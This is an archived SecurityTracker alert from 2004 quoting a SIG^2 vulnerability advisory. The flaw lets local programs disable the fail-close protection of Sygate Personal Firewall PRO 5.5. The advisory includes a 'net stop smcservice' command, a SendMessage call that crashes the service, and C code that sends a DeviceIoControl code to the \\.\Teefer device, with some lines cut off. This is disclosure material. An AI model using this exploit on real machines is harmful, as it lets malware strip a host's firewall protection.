Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (Firewall)  >   Sygate Personal Firewall Vendors:   Sygate
Sygate Personal Firewall PRO Fail-Safe Feature Can Be Bypassed By Local Users
SecurityTracker Alert ID:  1010480
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 13 2004
Impact:   Host/resource access via network, Modification of system information
Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): PRO 5.5 Build 2525
Description:   Tan Chew Keong of SIG^2 reported a vulnerability in Sygate Personal Firewall PRO. A local user or application can disable the firewall's fail-safe feature.

It is reported that the driver implementation (teefer.sys) contains a flaw that allows a local application to disable the fail-safe feature. Ordinarily, the fail-safe feature will block all traffic when the firewall service (smc.exe) is not loaded.

The report indicates that the driver does not authenticate received control codes to ensure that they originated from the firewall application. As a result, a local application can cause 'smc.exe' to crash and then can communicate directly with the device (\\device\Teefer) to disable the fail-safe protection.

The vendor was reportedly notified on May 30, 2004.

The original advisory is available at:

Impact:   A local user can disable the fail-safe feature.
Solution:   No solution was available at the time of this entry. The vendor is reportedly working on a fix for an upcoming release.
Vendor URL: (Links to External Site)
Cause:   Authentication error, State error
Underlying OS:  Windows (Any)
Underlying OS Comments:  Tested on Windows 2000 SP4

Message History:   None.

 Source Message Contents

Subject:  Sygate Personal Firewall PRO's Driver May be Disabled Locally by

SIG^2 Vulnerability Research Advisory

Sygate Personal Firewall PRO's Driver May be Disabled Locally by
Malicious Programs
by Tan Chew Keong
Release Date: 13 June 2004


Sygate Personal Firewall PRO (SPFP)
has redefined the personal firewall market with a multi-layered shield
of network,
content, application, and operating system security. Sygate Personal
Pro protects your system from intrusions designed to exploit
vulnerabilities in
Internet and Intranet communication. It is the ultimate desktop security
trusted by professionals and relied upon by millions of users.

SPFP has a fail-close feature that can be enabled to block all traffic when
the firewall service is not enabled. Hence, if a malicious program kills
firewall service (smc.exe), all traffic will be blocked. However, a flaw in
SPFP's driver implementation may be exploited locally to disable this


Sygate Personal Firewall PRO 5.5 Build 2525 on Win2k SP4


SPFP has a fail-close feature that can be enabled to block all traffic
when the
firewall service is not enabled. Hence, if a malicious program kills the
service (smc.exe), all traffic will be blocked. This feature may be
enabled from
SPFP's GUI menu with the following sequence of commands.
(Tools->options->Security Tab->"Block all traffic while the service is
not loaded").

SPFP is implemented as a user-space service (smc.exe), and as a
NDIS intermediate driver (teefer.sys). The driver creates a device named
\\device\Teefer. The user-space service (smc.exe, tfman.dll)
communicates with the
kernel-space driver through this device using specific Device I/O
control codes.

The driver does not validate the source of the control codes, and hence,
programs may send control codes to the driver to disable it's fail-close

SPFP tries to prevent this by allowing only one user-space program to
open it's
driver i.e. (Exclusive = TRUE when calling IoCreateDevice). Hence, as
long as smc.exe
is running, other programs cannot open this driver. However, this may be
overcomed in
the following two ways.

   1. If the malicious program runs with Administrator privilege, it can
simply stop
      smc.exe using

         1. net stop smcservice
         2. or by using Service Control Manager APIs.

   2. If the malicious program runs with non-administrator privilege,
smc.exe may be
      crashed by exploiting the List-View Control in SPFP's GUI.

      SendMessage(hHdrControl, HDM_GETITEMRECT, 1,

After stopping smc.exe, the fail-close protection may be disabled using
the following code.

    hDevice = CreateFile("\\\\.\\Teefer",
                     GENERIC_WRITE | GENERIC_READ,
                     FILE_SHARE_READ | FILE_SHARE_WRITE,

    if(hDevice == INVALID_HANDLE_VALUE)
        printf("Open failed\n");
        printf("Device opened.\n");

        char buffer[8];
        DWORD *ptr = (DWORD *)buffer;
        DWORD *ptr2 = (DWORD *)(buffer + 4);
        DWORD ret;

        *ptr = 0;
        *ptr2 = 0;

        if(DeviceIoControl(hDevice, 0x212094, buffer, 8, buffer, 8,
&ret, 0))



Vulnerability will be fixed in upcoming release with additional product
enhancements and performance tweaks.


20 May 04 - Vulnerability Discovered
30 May 04 - Initial Vendor Notification
08 Jun 04 - Initial Vendor Response
13 Jun 04 - Public Release


All guys at SIG^2 G-TEC Lab


Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2022, LLC